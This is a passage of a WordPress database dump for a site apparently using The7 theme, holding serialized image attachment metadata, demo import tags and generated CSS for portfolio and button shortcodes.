s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3428,2090,'_the7_imported_item','old-landing'),
(3429,2093,'_wp_attached_file','2020/03/cr-white-1.jpg'),
(3430,2093,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2020/03/cr-white-1.jpg\";s:8:\"filesize\";i:69037;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"cr-white-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:12041;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"cr-white-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6624;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3431,2093,'_the7_imported_item','old-landing'),
(3432,2097,'_wp_attached_file','2020/04/courses-demo.jpg'),
(3433,2097,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:24:\"2020/04/courses-demo.jpg\";s:8:\"filesize\";i:45826;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:24:\"courses-demo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10359;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:24:\"courses-demo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4433;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3434,2097,'_the7_imported_item','old-landing'),
(3435,2105,'_wp_attached_file','2020/04/demo-b-adv.jpg'),
(3436,2105,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:22:\"2020/04/demo-b-adv.jpg\";s:8:\"filesize\";i:88542;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"demo-b-adv-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13838;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"demo-b-adv-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6691;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3437,2105,'_the7_imported_item','old-landing'),
(3438,2143,'_wp_attached_file','2020/05/seven-fashion-blog-demo.jpg'),
(3439,2143,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:35:\"2020/05/seven-fashion-blog-demo.jpg\";s:8:\"filesize\";i:90376;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"seven-fashion-blog-demo-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:15008;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"seven-fashion-blog-demo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7369;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3440,2143,'_the7_imported_item','old-landing'),
(3441,2155,'_wp_attached_file','2020/05/store-fashion.jpg'),
(3442,2155,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:25:\"2020/05/store-fashion.jpg\";s:8:\"filesize\";i:123548;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"store-fashion-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13523;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"store-fashion-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6838;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3443,2155,'_the7_imported_item','old-landing'),
(3444,2156,'_wp_attached_file','2020/01/im-biz-cons.jpg'),
(3445,2156,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:23:\"2020/01/im-biz-cons.jpg\";s:8:\"filesize\";i:126483;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:23:\"im-biz-cons-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13557;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:23:\"im-biz-cons-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6741;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3446,2156,'_the7_imported_item','old-landing'),
(3447,2157,'_wp_attached_file','2020/05/store-rev-home.jpg'),
(3448,2157,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:750;s:6:\"height\";i:500;s:4:\"file\";s:26:\"2020/05/store-rev-home.jpg\";s:8:\"filesize\";i:40235;s:5:\"sizes\";a:2:{s:6:\"medium\";a:5:{s:4:\"file\";s:26:\"store-rev-home-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14164;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:26:\"store-rev-home-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6753;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3449,2157,'_the7_imported_item','old-landing'),
(3450,2158,'_wp_attached_file','2021/06/woocommerce-placeholder.png'),
(3451,2158,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1200;s:6:\"height\";i:1200;s:4:\"file\";s:35:\"2021/06/woocommerce-placeholder.png\";s:8:\"filesize\";i:102644;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12560;}s:5:\"large\";a:5:{s:4:\"file\";s:37:\"woocommerce-placeholder-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:92182;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:4228;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:35:\"woocommerce-placeholder-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:58715;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3452,2158,'_the7_imported_item','old-landing'),
(3453,2150,'the7_shortcodes_dynamic_css','a:20:{i:0;s:0:\"\";s:32:\"ce4d9d6450a73bfb8b23682b3e51a732\";s:187:\"#default-btn-ce4d9d6450a73bfb8b23682b3e51a732.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 12px;\n}\n#default-btn-ce4d9d6450a73bfb8b23682b3e51a732 > i {\n  margin-right: 12px;\n}\n\";s:32:\"f9177bc6496e0d5b336a5dded7122c91\";s:15367:\".portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .filter {\n  margin-bottom: 45px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.hover-scale article:after {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.gradient-overlay-layout-list article {\n  border-radius: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-thumbnail-wrap {\n  padding: 0px 0px 0px 0px;\n  border-radius: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-thumbnail-wrap *,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-thumbnail-rollover:after {\n  border-radius: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.gradient-overlay-layout-list) .post-thumbnail {\n  box-shadow: 0px 10px 45px 1px rgba(30,37,54,0.24);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.gradient-overlay-layout-list article {\n  box-shadow: 0px 10px 45px 1px rgba(30,37,54,0.24);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.gradient-overlay-layout-list) .post-thumbnail {\n  box-shadow: 0px 10px 45px 1px rgba(30,37,54,0.24);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.gradient-overlay-layout-list article {\n  box-shadow: 0px 10px 45px 1px rgba(30,37,54,0.24);\n}\n.bottom-overlap-layout-list.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .entry-title,\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.owl-carousel .entry-title {\n  margin-bottom: 0px;\n  font-size: 14px;\n  line-height: 14px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .entry-meta {\n  margin-bottom: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .portfolio-categories {\n  margin-bottom: 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.centered-layout-list) .post-entry-content {\n  padding: 15px 0px 0px 0px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 5px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    font-size: 14px;\n    line-height: 26px;\n    line-height: 14px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 50px;\n  grid-column-gap: 50px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -25px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 25px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 50px;\n  grid-row-gap: 50px;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid {\n  margin: -25px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 25px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 50px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.portfolio-masonry-shortcode-id-f9177bc6496e0d5b336a5dded7122c91.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";s:32:\"60ccaafa0e7c0b4b51e561f7ff872a3e\";s:187:\"#default-btn-60ccaafa0e7c0b4b51e561f7ff872a3e.ico-right-side > i {\n  margin-right: 0px;\n  margin-left: 14px;\n}\n#default-btn-60ccaafa0e7c0b4b51e561f7ff872a3e > i {\n  margin-right: 14px;\n}\n\";s:32:\"505ca736a9ea6ca0b5a6ef0303f8de4e\";s:761:\".shortcode-single-image-wrap.shortcode-single-image-505ca736a9ea6ca0b5a6ef0303f8de4e.enable-bg-rollover .rollover i,\n.shortcode-single-image-wrap.shortcode-single-image-505ca736a9ea6ca0b5a6ef0303f8de4e.enable-bg-rollover .rollover-video i {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.shortcode-single-image-wrap.shortcode-single-image-505ca736a9ea6ca0b5a6ef0303f8de4e .rollover-icon {\n  font-size: 32px;\n  color: #ffffff;\n  min-width: 44px;\n  min-height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  border-style: 